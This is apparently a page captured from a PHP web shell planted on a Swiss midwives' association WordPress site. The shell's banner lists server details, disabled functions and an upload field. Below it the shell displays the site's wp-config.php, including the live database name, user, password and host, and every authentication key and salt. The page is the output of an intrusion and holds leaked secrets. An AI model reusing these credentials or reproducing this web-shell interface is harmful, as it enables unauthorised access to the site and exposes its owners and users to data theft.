| Server IP : 185.125.27.153 / Your IP : 216.73.216.187 Web Server : Apache System : Linux d6e05399ed1f11695f7c56648ed78c66 6.1.0-0.deb11.50-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.176-1~deb11u1 (2026-07-02) x86_64 User : uid174255 ( 174255) PHP Version : 8.3.31 Disable Function : exec,passthru,pcntl_exec,popen,proc_open,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/clients/d6e05399ed1f11695f7c56648ed78c66/sites/schwyzer-hebammen.ch/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'og84m_WP1290230');
/** MySQL database username */
define('DB_USER', 'og84m_WP1290230');
/** MySQL database password */
define('DB_PASSWORD', 'mX7z4872qW');
/** MySQL hostname */
define('DB_HOST', 'og84m.myd.infomaniak.com');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'sSzR`FdHi1)>niXh7_@1`sz^0Z>Y8IPa4YC||2;4>O8q44>|7KJo9p4o4qJFo:js');
define('SECURE_AUTH_KEY', '(!nTaiS?I6S:@QNPv.qzJ:z*iy>nN%PoJH7/K?<f,Z@mEN6q`!I%qzjjepOpt;V)');
define('LOGGED_IN_KEY', '8;rUXof:ejLj:YjDO+~C#wKE6tkH3H1|}(0tJhN=-INSJRm!~ZQVV@CYvL3_!EMi');
define('NONCE_KEY', 'C}h{|J7O;.GxzyK_)Jb}&!9X}^EE.`hMk-J@?^xHVn}f;CpabO=P^s=;=L.*`TA;');
define('AUTH_SALT', ',5!%qC?Mzd>AU=1Hs,A+{R!0qYfjOfu%RHNn~A/&TpCYm5#hiscLVaZIlTbxi!d.');
define('SECURE_AUTH_SALT', 'tDA9sB_av%Pp@z?#L4LC~tb8(b{|06j!A>_k=S^^>bXm4RSB+)5N+fiNCT/1xWfc');
define('LOGGED_IN_SALT', '4C~2)=%ZR_qU(.copA{XZrjplJO-9iW)JBrVeZqL+;ac%B~91=jTIgk2WY9!sHbt');
define('NONCE_SALT', 'luQ`6sGXAXSU0F8vY#v*Cg19yEc@n=9khM3ZS+woDMMlZ^3}wLwef/dcaNJrbr^P');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_1290230_';
/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
* language support.
*/
//define('WPLANG', 'de_DE');
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
define('WP_DEBUG_LOG', false);
define('WP_DEBUG_DISPLAY', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');